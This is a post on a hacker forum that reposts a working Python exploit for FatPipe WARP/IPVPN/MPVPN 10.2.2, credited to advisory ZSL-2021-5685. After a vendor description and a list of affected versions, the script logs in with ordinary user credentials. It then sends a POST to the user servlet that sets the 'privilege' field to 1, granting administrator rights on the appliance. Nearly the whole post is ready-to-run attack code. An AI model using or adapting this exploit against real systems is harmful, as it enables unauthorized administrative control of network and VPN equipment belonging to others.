Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation

 Share


Recommended Posts

# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
#                   10.2.2r38
#                   10.2.2r25
#                   10.2.2r10
#                   10.1.2r60p82
#                   10.1.2r60p71
#                   10.1.2r60p65
#                   10.1.2r60p58s1
#                   10.1.2r60p58
#                   10.1.2r60p55
#                   10.1.2r60p45
#                   10.1.2r60p35
#                   10.1.2r60p32
#                   10.1.2r60p13
#                   10.1.2r60p10
#                   9.1.2r185
#                   9.1.2r180p2
#                   9.1.2r165
#                   9.1.2r164p5
#                   9.1.2r164p4
#                   9.1.2r164
#                   9.1.2r161p26
#                   9.1.2r161p20
#                   9.1.2r161p17
#                   9.1.2r161p16
#                   9.1.2r161p12
#                   9.1.2r161p3
#                   9.1.2r161p2
#                   9.1.2r156
#                   9.1.2r150
#                   9.1.2r144
#                   9.1.2r129
#                   7.1.2r39
#                   6.1.2r70p75-m
#                   6.1.2r70p45-m
#                   6.1.2r70p26
#                   5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative  rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#

import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()

if len(sys.argv) !=2:
    print
    print("********************************************************")
    print("*                                                      *")
    print("* Privilege escalation from USER to ADMINISTRATOR role *")
    print("*                          in                          *")
    print("*           FatPipe WARP/IPVPN/MPVPN v10.2.2           *")
    print("*                                                      *")
    print("*                     ZSL-2021-5685                    *")
    print("*                                                      *")
    print("********************************************************")
    print("\n[POR] Usage: ./escalator.py [IP]")
    sys.exit()

ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")

sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}

hederi={'Sec-Ch-Ua'       :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
        'Accept'          :'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With':'XMLHttpRequest',
        'Sec-Ch-Ua-Mobile':'?0',
        'User-Agent'      :'Fatnet/1.b',
        'Content-Type'    :'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin'          :'https://'+ajpi,
        'Sec-Fetch-Site'  :'same-origin',
        'Sec-Fetch-Mode'  :'cors',
        'Sec-Fetch-Dest'  :'empty',
        'Referer'         :'https://'+ajpi+'/fpui/dataCollectionServlet',
        'Accept-Encoding' :'gzip, deflate',
        'Accept-Language' :'en-US,en;q=0.9',
        'Connection'      :'close'}

juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)

if not 'success' in alo.text:
    print('[GRE] Login error.')
    sys.exit()
else:
    print('[POR] Authentication successful.')

print('[POR] Climbing the ladder...')

sluba='''
||    ||       .--._
||====|| __   '---._)
||    ||"")\   Q Q )
||====|| =_/   o  /
||    || | \_.-;-'-,._
||====|| |  '  o---o   )
||    ||  \   /H __H\  /
||====||   '-' \"")\/  |
||    ||     _ |_='-)_/
||====||    /  '.    )
||    ||   /         /
||====||  |___/\|   /
||    ||   |_|  |   |
||====||  /  )  \\   \\
||    || (__/    \___\\
||====||           \_\\
||    ||           /  )
||====||          (__/
'''

for k in sluba:
    sys.stdout.write(k)
    sys.stdout.flush()
    time.sleep(0.01)

juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)

if not 'true' in stanje.text:
    print('\n[GRE] Something\'s fishy!')
    sys.exit()
else:
    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
    sys.exit()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...